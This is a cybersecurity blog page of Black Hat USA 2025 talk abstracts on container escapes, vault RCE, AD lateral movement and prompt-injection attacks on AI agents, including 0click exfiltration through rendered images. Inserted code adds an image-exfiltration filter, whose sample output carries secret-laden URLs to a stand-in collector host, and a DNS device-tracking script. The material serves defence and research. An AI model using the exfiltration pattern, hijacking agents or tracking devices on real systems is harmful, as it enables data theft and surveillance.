The overwhelming majority of AI applications run on NVIDIA hardware and software and use NVIDIA tools to containerize and isolate applications running on the same infrastructure. A vulnerability in this single point of failure could allow the breakdown of security mechanisms and takeover of the AI infrastructure. In this research project, we managed to prove this scenario is indeed possible. We found a critical vulnerability in one of the foundational software components that powers all the world's AI managed infrastructure: the NVIDIA Container Toolkit. This vulnerability allows an attacker to escape from the container to the underlying host and often compromise the entire Kubernetes cluster. We tested this vulnerability on all major AI platforms, all of which proved to be susceptible to this attack. In some cases, the container escape was sufficient to prove unauthorized cross-tenant data access, including credentials and customer data, breaching the platform's foundational security model. We'll take a deep dive into two case studies with completely different results: Replicate and DigitalOcean. In this talk, we will dive into our findings, starting from the discovery of the vulnerability itself, through its real-world exploitation on AI cloud services, finishing with the details of industry-wide impact. Attendees will learn about how major cloud services operate their security behind the scenes and the lessons they can apply to their own environment.
By:
Andres Riancho | Security Researcher, Wiz
Hillai Ben-Sasson | Security Researcher, Wiz
Ronen Shustin | Security Researcher, Wiz
Presentation Materials Available at: https://ift.tt/EsT7Fe9
source https://www.youtube.com/watch?v=5RH0StmV7Eo
The Cyber Stream
Latest News for Cyber Security & Technology
Monday, 23 February 2026
Black Hat USA 2025 | Autonomous Timeline Analysis and Threat Hunting: An AI Agent for Timesketch
Digital incident timeline analysis is a complex and time-consuming task. It demands highly skilled professionals with deep domain knowledge, who must invest significant time, sometimes weeks, to unravel difficult cases. Investigators must reconstruct event timelines, from initial access to exploitation and lateral movement, by sifting through hundreds of millions of log records from hundreds of different and potentially unfamiliar log types. Log-normalization and collaborative analysis tools like Plaso and Timesketch offer valuable assistance, yet the cost in time and expertise remains substantial. In this talk, we present the first AI-powered agent capable of autonomously performing digital forensic analysis on the large and varied log volumes typically encountered in real-world incidents. Furthermore, we demonstrate the agent's proficiency in threat hunting, that is, identifying and explaining evidence of system compromise without needing predefined attack signatures. We evaluate our technique on a dataset of 100 diverse, real-world compromised systems. The agent achieves high recall and precision on finding and contextualizing individual log records pertaining to the overall attack chain. This performance is driven by a core combining sophisticated prompting techniques and reinforcement learning.
By:
Alex Kantchelian | Staff Software Engineer, Google
Maarten van Dantzig | Senior Security Engineer, Google
Diana Kramer | Senior Security Engineer, Google
Presentation Materials Available at: https://ift.tt/C3Z5sHB
source https://www.youtube.com/watch?v=9EA7kz4bGvQ
Sunday, 22 February 2026
Black Hat USA 2025 | AI Enterprise Compromise - 0click Exploit Methods
Compromising a well-protected enterprise used to require careful planning, proper resources, and the ability to execute. Not anymore! Enter AI. Initial access? AI is happy to let you operate on its users' behalf. Persistence? Self-replicate through corp docs. Data harvesting? AI is the ultimate data hoarder. Exfil? Just render an image. Impact? So many tools at your disposal. There's more. You can do all this as an external attacker. No credentials required, no phishing, no social engineering, no human-in-the-loop. In-and-out with a single prompt. Last year at Black Hat USA, we demonstrated the first real-world exploitation of AI vulnerabilities impacting enterprises, living off Microsoft Copilot. A lot has changed in the AI space since... for the worse. AI assistants have morphed into agents. They read your search history, emails and chat messages. They wield tools that can manipulate the enterprise environment on behalf of users, or a malicious attacker once hijacked. We will demonstrate access-to-impact AI vulnerability chains in most flagship enterprise AI assistants: ChatGPT, Gemini, Copilot, Einstein, and their custom agents. Some require one bad click by the victim, others work with no user interaction: 0click attacks. The industry has no real solution for fixing this. Prompt injection is not another bug we can fix. It is a security problem we can manage! We will offer a security framework to help you protect your organization: the GenAI Attack Matrix. We will compare mitigations set forth by AI vendors, and share which ones successfully prevent the worst 0click attacks. Finally, we'll dissect our own attacks, breaking them down into basic TTPs, and showcase how they can be detected and mitigated.
By:
Michael Bargury | CTO, Zenity
Tamir Ishay Sharbat | AI Researcher, Zenity
Full Session Details Available at: https://ift.tt/bsKoH0d
source https://www.youtube.com/watch?v=M_BDq2hTJxU
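The "Exfil? Just render an image" step in the abstract above refers to a well-known agent exfiltration channel: injected instructions make the assistant emit an image reference whose URL carries harvested data, and the client leaks it simply by fetching the image, with no click. As an added example (not code from the talk or from Zenity), the following output-layer filter denies that channel by only rendering images from an allowlisted set of hosts and refusing URLs that carry a query string or are unusually long. The allowlist, the length limit and the sample assistant output are all constructed assumptions for the demo.

```python
import re
from urllib.parse import urlparse

# Assumption: the application only ever needs to render images from these
# hosts. Any other destination is an unexpected sink for model-controlled data.
ALLOWED_IMAGE_HOSTS = {"images.example.com"}

# Assumption: legitimate image URLs are short; long ones are a smuggling signal.
MAX_URL_LEN = 256

# Markdown image syntax ![alt](url) and bare HTML <img src="...">. Both are
# fetched by the renderer without user interaction, which is what makes them
# a 0click exfiltration channel.
MD_IMAGE = re.compile(r'!\[[^\]]*\]\(\s*([^)\s]+)[^)]*\)')
HTML_IMG = re.compile(r'<img\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)


def classify_image_url(url):
    """Return a reason string if the URL must not be rendered, else None."""
    parts = urlparse(url)
    if parts.scheme != "https":
        return f"scheme {parts.scheme!r} not allowed"
    if parts.hostname not in ALLOWED_IMAGE_HOSTS:
        return f"host {parts.hostname!r} not in allowlist"
    if parts.query or len(url) > MAX_URL_LEN:
        # Even on an allowed host, the query string or an over-long path is
        # where injected instructions would encode the harvested data.
        return "url carries a query string or is unusually long"
    return None


def sanitize_model_output(text):
    """Replace disallowed image references in assistant output with a placeholder.

    Returns (sanitized_text, blocked) where blocked is a list of (url, reason).
    """
    blocked = []

    def _sub(match):
        url = match.group(1)
        reason = classify_image_url(url)
        if reason is None:
            return match.group(0)          # keep the original reference
        blocked.append((url, reason))
        return "[image removed: untrusted destination]"

    text = MD_IMAGE.sub(_sub, text)
    text = HTML_IMG.sub(_sub, text)
    return text, blocked


# Constructed example of assistant output after a prompt injection: the
# harvested secret is base64 inside the image URL, so rendering alone leaks it.
SAMPLE_OUTPUT = (
    "Here is the summary of your inbox.\n"
    "![logo](https://images.example.com/logo.png)\n"
    "![](https://collector.invalid/p.gif?d=U2VjcmV0OiBhY21lLWFwaS1rZXk=)\n"
    '<img src="http://collector.invalid/x.png?d=dG9rZW4">'
)


def demo():
    return sanitize_model_output(SAMPLE_OUTPUT)


if __name__ == "__main__":
    cleaned, blocked = demo()
    print(cleaned)
    for url, reason in blocked:
        print("blocked:", url, "->", reason)
```

The filter is deliberately placed after the model and before the renderer: it does not try to detect the injection itself (the abstract's point is that prompt injection is managed, not fixed) but removes the sink the injection needs. A Content Security Policy with an equivalent `img-src` allowlist gives the same guarantee at the browser layer and is worth pairing with this.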
Black Hat USA 2025 | Vaulted Severance: Your Secrets Are Now Outies
Enterprise vaults are meant to be the last line of defense, the trusted stronghold for your organization's most sensitive assets: secrets, credentials, and encryption keys. But what if the vault itself can be breached remotely, without even logging in? In this session, we disclose two novel, confirmed remote code execution (RCE) chains affecting the world's most widely adopted vault systems: HashiCorp Vault and CyberArk Conjur. For the first time, we demonstrate a full RCE chain in HashiCorp Vault, coinciding with its 10-year anniversary. For CyberArk Conjur, we present the kind of pre-auth RCE that keeps admins up at night. This isn't theoretical. We'll show it live on stage, against default, out-of-the-box configurations. And just as importantly, we'll walk through how these attacks can be detected and prevented, before your secrets become outies.
By:
Shahar Tal | CEO, Cyata Security
Yarden Porat | Core Team Engineer, Cyata Security
Full Session Details Available at: https://ift.tt/cSlOefs
source https://www.youtube.com/watch?v=KC-8DhS8x5Q
Saturday, 21 February 2026
Black Hat USA 2025 | A Fireside Chat with Cognitive Scientist and AI Expert Gary Marcus
Cybersecurity, AI, and Our Brains: A Fireside Chat with Cognitive Scientist and AI Expert Gary Marcus
Join us for a fireside chat with cognitive scientist Gary Marcus as we explore the new but often overhyped world of AI oracles and assistants. For the time being, the most valuable resource for security professionals and hackers isn't cutting-edge tools or vendor-purchased products. It's our brains. Our discussion examines the hype surrounding generative AI and the effects of treating it like a magic wand instead of a tool in our toolkit. We address the potential pitfalls that arise from the overuse of AI tools for cognitive offloading and discuss mitigation strategies to protect ourselves from these risks.
By:
Gary Marcus | Founder and Executive Chairman, Robust AI
Nathan Hamiel | Senior Director of Research, Kudelski Security
Full Session Details Available at: https://ift.tt/yeWDK6n
source https://www.youtube.com/watch?v=e69OE0ZjskA
Black Hat USA 2025 | Hacking the Status Quo: Tales From Leading Women in Cybersecurity
Join us for an inspiring conversation with leading women in cybersecurity, each bringing a wealth of experience spanning deep technical research, engineering, and various aspects of security leadership. In this panel, they will share their journeys, challenges, and triumphs in the ever-evolving world of cybersecurity. Whether you're a mid-career professional or a seasoned professional, this session offers a rare chance to connect directly with trailblazers who are shaping the future of the industry. Ask questions, gain real-world insights, and walk away with practical takeaways, renewed motivation, and a sense of community. Let's talk about careers, challenges, and the power of perseverance and purpose in cybersecurity.
By:
Valentina Palmiotti | Head of X-Force Offensive Research (XOR), IBM
Kymberlee Price | Engineering Response Founder + CEO, Zatik Security
Chi-en (Ashley) Shen | Security Research Engineering Technical Leader, Cisco Talos
Natalie Silvanovich | Team Lead & Security Engineer, Google Project Zero
Vandana Verma | Black Hat USA Review Board Member
Full Session Details Available at: https://ift.tt/lpcAh4s
source https://www.youtube.com/watch?v=8V4i8TW1YXU
Friday, 20 February 2026
Black Hat USA 2025 | Exploiting DNS for Stealthy User Tracking
Who needs AI when raw statistics can do the job just as well, if not better? Every Domain Name System (DNS) query leaves a trail, and with the right statistical techniques, you can uncover user behaviors, fingerprint devices, and even track individuals across networks. This session dives into how simple yet powerful methods like frequency analysis, correlation metrics, and anomaly detection can turn DNS traffic into a goldmine of intel. We dissected over 1.5 billion DNS requests from 30,000 iOS and Android devices over a 30-day period, and the results are eye-opening. Within just minutes of observing DNS traffic, devices begin to reveal their unique fingerprints. Given only a few hours, accurate identification becomes a certainty. But here's where it gets even more interesting: iOS devices flood the network with repetitive DNS requests, hitting the same domains over and over, while Android devices operate nearly 10x more efficiently, generating far less noise. This difference isn't just a curiosity; it's the key to our findings. With as little as 20% of DNS traffic for both iOS and Android, device tracking becomes shockingly precise. Our research shows that simple statistical techniques are more than enough to achieve highly accurate tracking, with no need for AI or complex models. This paves the way for real-world applications, especially in resource-constrained environments like routers, and, in general, in embedded systems. The combination of simplicity, accuracy, and scalability makes the technique a great candidate for large-scale deployments. Of course, where there's a method, there's a defense. We'll also explore countermeasures to mitigate these vulnerabilities. To this end, DNSSEC and other secure protocols offer some level of protection, though as we'll demonstrate, true privacy is much harder to achieve than most expect.
By:
Bela Genge | Senior Security Researcher, Bitdefender
Ioan Padurean | Junior Security Researcher, Bitdefender
Dan Macovei | Director of Product Management
Presentation Materials Available at: https://ift.tt/5XLF28r
source https://www.youtube.com/watch?v=xQy1YcLK1Ak
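To make the "frequency analysis plus correlation metrics" idea in the abstract above concrete, here is an added example (not Bitdefender's code or method) of the simplest version of the technique: build a normalized domain-frequency vector per device from a training window of DNS queries, then identify a device from a fresh window in which the observer sees only a fraction of its queries, using cosine similarity as the correlation metric. The per-device query mixes are constructed assumptions; the iOS profiles are deliberately given a few heavily repeated domains to mirror the abstract's observation that iOS devices re-query the same names far more than Android.

```python
import math
import random
from collections import Counter

# Constructed per-device query mixes (domain -> relative weight). These stand
# in for real resolver or router logs and are assumptions for the demo.
PROFILES = {
    "ios-A": {"gateway.icloud.com": 40, "api.apple-cloudkit.com": 25,
              "mask.icloud.com": 20, "cdn.example.net": 10, "news.example.com": 5},
    "ios-B": {"gateway.icloud.com": 35, "push.apple.com": 30,
              "graph.facebook.com": 20, "cdn.example.net": 15},
    "android-C": {"connectivitycheck.gstatic.com": 30, "play.googleapis.com": 30,
                  "mtalk.google.com": 20, "news.example.com": 20},
}


def synth_queries(profile, n, rng):
    """Draw n queried domain names from a weighted profile (constructed traffic)."""
    domains, weights = zip(*profile.items())
    return rng.choices(domains, weights=weights, k=n)


def build_fingerprint(domains):
    """Frequency analysis: normalized domain-frequency vector for one device."""
    counts = Counter(domains)
    total = sum(counts.values())
    return {d: c / total for d, c in counts.items()}


def cosine(p, q):
    """Correlation metric between two sparse frequency vectors (0.0 if either is empty)."""
    dot = sum(v * q.get(d, 0.0) for d, v in p.items())
    norm_p = math.sqrt(sum(v * v for v in p.values()))
    norm_q = math.sqrt(sum(v * v for v in q.values()))
    return dot / (norm_p * norm_q) if norm_p and norm_q else 0.0


def identify(sample_domains, fingerprints):
    """Match an unlabeled query sample to the most similar known fingerprint.

    Returns (device_id, score, margin); margin is the gap to the runner-up and
    is the number to threshold on before trusting a match.
    """
    sample = build_fingerprint(sample_domains)
    ranked = sorted(((cosine(sample, fp), dev) for dev, fp in fingerprints.items()),
                    reverse=True)
    best_score, best_dev = ranked[0]
    runner_up = ranked[1][0] if len(ranked) > 1 else 0.0
    return best_dev, best_score, best_score - runner_up


def run_experiment(fraction=0.2, train_n=1000, test_n=500, seed=7):
    """Train fingerprints on one window, then re-identify every device from a
    fresh window in which the observer only sees `fraction` of its queries."""
    rng = random.Random(seed)
    fingerprints = {dev: build_fingerprint(synth_queries(p, train_n, rng))
                    for dev, p in PROFILES.items()}
    results = {}
    for dev, p in PROFILES.items():
        fresh = synth_queries(p, test_n, rng)
        observed = [d for d in fresh if rng.random() < fraction]  # partial visibility
        results[dev] = identify(observed, fingerprints)
    return results


if __name__ == "__main__":
    for true_dev, (guess, score, margin) in run_experiment().items():
        print(f"{true_dev:10s} -> {guess:10s} score={score:.3f} margin={margin:.3f}")
```

Two devices that share a vendor (the two iOS profiles both query gateway.icloud.com) still separate cleanly because the metric weights the whole distribution, not the presence of any single domain; that is also why dropping 80% of the traffic barely hurts, since the relative frequencies survive subsampling. The defensive corollary is the one the abstract hints at: DNSSEC authenticates answers but does not hide the query names, so this fingerprint is unaffected by it, whereas encrypted DNS to a shared resolver removes the on-path observer's view of the names altogether.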
Black Hat USA 2025 | From Prompts to Pwns: Exploiting and Securing AI Agents
The flexibility and power of large language models (LLMs) are now well understood, driving their integration into a wide array of real-world applications. Early use cases, such as retrieval-augmented generation (RAG), followed rigid, predictable workflows where models interacted with external systems in tightly controlled sequences. While these systems were easier to optimize and secure, they often resulted in inflexible, single-purpose tools. In contrast, modern agentic systems leverage expanded input modalities, such as speech and vision, and use more sophisticated inference strategies, such as dynamic chain-of-thought reasoning. These advancements allow them to act independently on users' behalf to automate increasingly complex workflows, often involving sensitive data and systems. As their utility increases, so too does their attack surface: more usability means broader access to data, greater ability to execute actions, and significantly more opportunity for exploitation. In this talk, we will explore the emerging security challenges posed by agentic AI systems. We demonstrate the implications of this significant shift through internal assessments and proof-of-concept exploits developed by our AI Red Team, targeting a range of agentic applications, from popular open-source tools to enterprise systems. These exploits all leverage the same core finding: that LLMs are uniquely vulnerable to malicious input, and exposure to such input can have a significant impact on the trust of downstream actions. In short, we lay out what can go wrong when agentic systems vulnerable to adversarial inputs are deployed within enterprise environments. We conclude by discussing how NVIDIA addresses the security of emerging agentic workflows, and our principles for designing agent interactions in ways that mitigate risk, emphasizing a security-first foundation for safe and scalable adoption. 
By:
Rebecca Lynch | Offensive Security Researcher, NVIDIA
Rich Harang | Principal Security Architect, NVIDIA
Presentation Materials Available at: https://ift.tt/FjcC9HR
source https://www.youtube.com/watch?v=zipgr080EQU
Thursday, 19 February 2026
Black Hat Europe 2025 Highlights | Record‑Breaking 4,500+ Attendees
Setting a new attendance record with more than 25% growth, Black Hat Europe 2025 brought together more than 4,500 security professionals from across the globe, showcasing the research, insights, and innovations shaping the future of cybersecurity. This year's event delivered:
✔️ Cutting-edge content from top researchers and practitioners
✔️ Hands-on learning through labs, workshops, and demos
✔️ A high-energy Business Hall featuring the world's leading security organizations
From breakthrough briefings to unmatched networking opportunities, Black Hat Europe 2025 set the stage for the next evolution of cyber defense.
Upcoming Black Hat events: https://ift.tt/CBkqYPK
Become a sponsor: https://ift.tt/QPgoqcV
#BlackHatEurope #BHEU #Cybersecurity #InfoSec #BlackHat
source https://www.youtube.com/watch?v=tfptvW07N-E
Wednesday, 18 February 2026
Black Hat USA 2025 | Locknote: Conclusions & Key Takeaways from Black Hat USA 2025
Join Black Hat USA Review Board Members for a compelling discussion on the most pressing issues facing the InfoSec community today. This distinguished panel will analyze key conference takeaways and provide valuable insights on how emerging trends will shape future security strategies. Don't miss this opportunity to hear candid perspectives from some of cybersecurity's most influential voices.
By:
Heather Adkins | Security Engineering
Daniel Cuthbert | Global Head of Security Research
Aanchal Gupta | Chief Security Officer, Adobe
Jason Haddix | CEO, Hacker & Trainer, Arcanum Information Security
Jeff Moss | Founder, Black Hat and DEF CON
Full Session Details Available at: https://ift.tt/Ne6kX0d
source https://www.youtube.com/watch?v=DmXlafnjn0M
Tuesday, 17 February 2026
Black Hat USA 2025 | Advanced Active Directory to Entra ID Lateral Movement Techniques
Is there a security boundary between Active Directory and Entra ID in a hybrid environment? The answer to this question, while still somewhat unclear, has changed over the past few years as there has been more hardening of how much "the cloud" trusts data from on-premises. The reason for this is that many threat actors, including APTs, have been making use of known lateral movement techniques to compromise the cloud from AD. In this talk, we will take a deep dive together into Entra ID and hybrid AD trust internals. We will introduce several new lateral movement techniques that allow us to bypass authentication, MFA and stealthily exfiltrate data using on-premises AD as a starting point, even in environments where the classical techniques didn't work. All these techniques are new, not really vulnerabilities, but part of the design. Several of them have been remediated with recent hardening efforts by Microsoft. Very few of them leave useful logs behind when abused. As you would expect, none of these "features" are documented. Join me for a wild ride into Entra ID internals, undocumented authentication flows and tenant compromise from on-premises AD.
By:
Dirk-jan Mollema | Security Researcher, Outsider Security
Presentation Materials Available at: https://ift.tt/X4g86EP
source https://www.youtube.com/watch?v=rzfAutv6sB8